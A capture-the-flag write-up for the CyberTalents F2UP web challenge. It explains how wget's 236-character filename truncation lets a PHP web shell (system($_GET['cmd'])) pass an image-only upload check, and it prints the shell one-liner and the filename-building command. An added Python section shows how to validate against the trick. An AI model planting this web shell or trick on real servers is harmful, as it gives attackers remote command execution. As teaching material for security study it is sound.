
Cybertalents F2UP Web Challenge Writeup

Description

This is the most secure way to file upload, is it?

Difficulty: Medium

Challenge Link: https://cybertalents.com/challenges/web/f2up

Solution

Exploring

When you open the challenge you will find a web page that looks like this:

I tried to upload a PHP file, but it says:

I also uploaded a normal image to see where uploaded files are stored, and the path was:

It seems that the website fetches the image by its URL, so I thought it might be an SSRF: if I supplied my webhook link, I could receive the flag. That didn't work. There is a hint on the page that says it is using wget.php:

I searched about some unrestricted file upload bypass techniques and I stumbled upon this one:

https://book.hacktricks.xyz/pentesting-web/file-upload#wget-file-upload-ssrf-trick

Exploitation

This great resource says that if you download a file using wget whose name is longer than 236 characters, the tool truncates the rest of the name and saves the file with only the first 236 characters. Cool!

Let’s build our file:

root@kali:~/CyberTalents/F2UP> echo '<?php echo system($_GET["cmd"]); ?>' > $(python -c 'print("A"*(236-4)+".php"+".gif")')
root@kali:~/CyberTalents/F2UP> ls
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php.gif

The file contains a web-based shell so that commands can be executed on the server. The problem now is how to get this file onto the server, because the upload form only accepts a URL.
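To see why the 236-character limit matters from the validator's side, here is an added Python example; it is not part of the original writeup or of the challenge's code. It models the truncation the post describes as a constant, builds the same 232 A's + ".php" + ".gif" name from the command above, and contrasts a check on the supplied URL's extension with a check on the name that would actually land on disk. The wget behaviour, the limit, the host name and the allowed-extension list are assumptions taken from the post or constructed here.

```python
import os
import secrets
from typing import Optional
from urllib.parse import unquote, urlparse

# Assumption taken from the writeup: wget keeps only the first 236 characters of
# the basename it saves, so anything past that point is silently dropped.
WGET_NAME_LIMIT = 236

# Extensions an image-upload endpoint would plausibly allow (constructed list).
ALLOWED_EXTENSIONS = {".gif", ".jpg", ".jpeg", ".png"}

# Constructed sample URL mirroring the filename built in the shell command above:
# 232 'A's + ".php" (236 chars) + ".gif" (240 chars in total). The host is a placeholder.
EXAMPLE_URL = "http://example.invalid/" + "A" * (WGET_NAME_LIMIT - 4) + ".php.gif"


def basename_from_url(url: str) -> str:
    """Return the decoded last path segment, which is what wget uses as the filename."""
    return os.path.basename(unquote(urlparse(url).path))


def stored_name(url: str, limit: int = WGET_NAME_LIMIT) -> str:
    """Model the name that ends up on disk after the truncation described in the post."""
    return basename_from_url(url)[:limit]


def stored_extension(url: str) -> str:
    """Extension of the file as it would actually be saved, not as it appears in the URL."""
    return os.path.splitext(stored_name(url))[1].lower()


def naive_check(url: str) -> bool:
    """The weak check: look only at the extension of the URL the user supplied."""
    ext = os.path.splitext(basename_from_url(url))[1].lower()
    return ext in ALLOWED_EXTENSIONS


def hardened_check(url: str, limit: int = WGET_NAME_LIMIT) -> bool:
    """Reject anything whose on-disk name could differ from the name that was checked.

    Two conditions: the basename must fit within the downloader's limit (so nothing
    is truncated), and the extension of the stored name must be allowed. The length
    check is what closes the truncation gap; os.path.splitext alone would still
    report ".gif" for the 240-character name.
    """
    name = basename_from_url(url)
    if not name or len(name) > limit:
        return False
    return stored_extension(url) in ALLOWED_EXTENSIONS


def safe_target_name(url: str) -> Optional[str]:
    """Preferred mitigation: never reuse the client-controlled name at all.

    Validate the URL with hardened_check, then store the download under a random
    server-generated name that carries only the vetted extension.
    """
    if not hardened_check(url):
        return None
    return secrets.token_hex(16) + stored_extension(url)


if __name__ == "__main__":
    print("URL extension passes naive check:", naive_check(EXAMPLE_URL))       # True
    print("Extension actually stored:       ", stored_extension(EXAMPLE_URL))  # .php
    print("Hardened check result:           ", hardened_check(EXAMPLE_URL))    # False
    print("Server-side name for a plain gif:", safe_target_name("http://example.invalid/cat.gif"))
```

The point of the contrast is that the naive check and the downloader disagree about which file is being saved: the check sees ".gif" at the end of the URL, while the truncated name on disk ends in ".php". Checking the length against the downloader's limit, and better still discarding the client-supplied name in favour of a generated one, removes that disagreement.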

I tried to serve the file from a Python HTTP server on my local machine, but it didn't work. So I uploaded the file to GitHub to be able to use it in the exploit and get RCE, and also to make it easier for anyone who wants to use this file to solve the challenge.

https://github.com/ItsFadinG/wget-File-Upload-Exploit

Now, we will upload the file to the challenge server:

It has been downloaded successfully! Let’s get the Flag:

This post is licensed under CC BY 4.0 by the author.